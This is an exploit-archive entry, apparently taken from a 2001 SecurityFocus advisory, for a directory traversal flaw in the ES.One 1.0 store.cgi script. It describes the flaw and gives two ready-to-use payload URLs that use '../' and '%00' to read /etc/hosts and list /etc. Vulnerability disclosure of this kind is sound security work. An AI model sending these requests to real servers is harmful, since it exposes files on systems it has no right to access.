[] NeoSense

thinking arts es.one 1.0 - Directory Traversal

Author: slipy
type: remote
platform: linux
port: 
date_added: 2001-02-16 
date_updated: 2012-08-18 
verified: 1 
codes: CVE-2001-0305;OSVDB-528 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/2385/info

It is possible for a remote user to gain read access to directories and files outside the root directory of ES.One. Requesting a specially crafted URL by way of 'store.cgi', composed of '/../' sequences and appended with '%00' will disclose an arbitrary directory.

http://target/cgi-bin/store.cgi?StartID=../etc/hosts%00.html

^^ = Will obviously open the hosts file.

http://target/cgi-bin/store.cgi?StartID=../etc/%00.html

^^ = Will obviously list the /etc/ directory.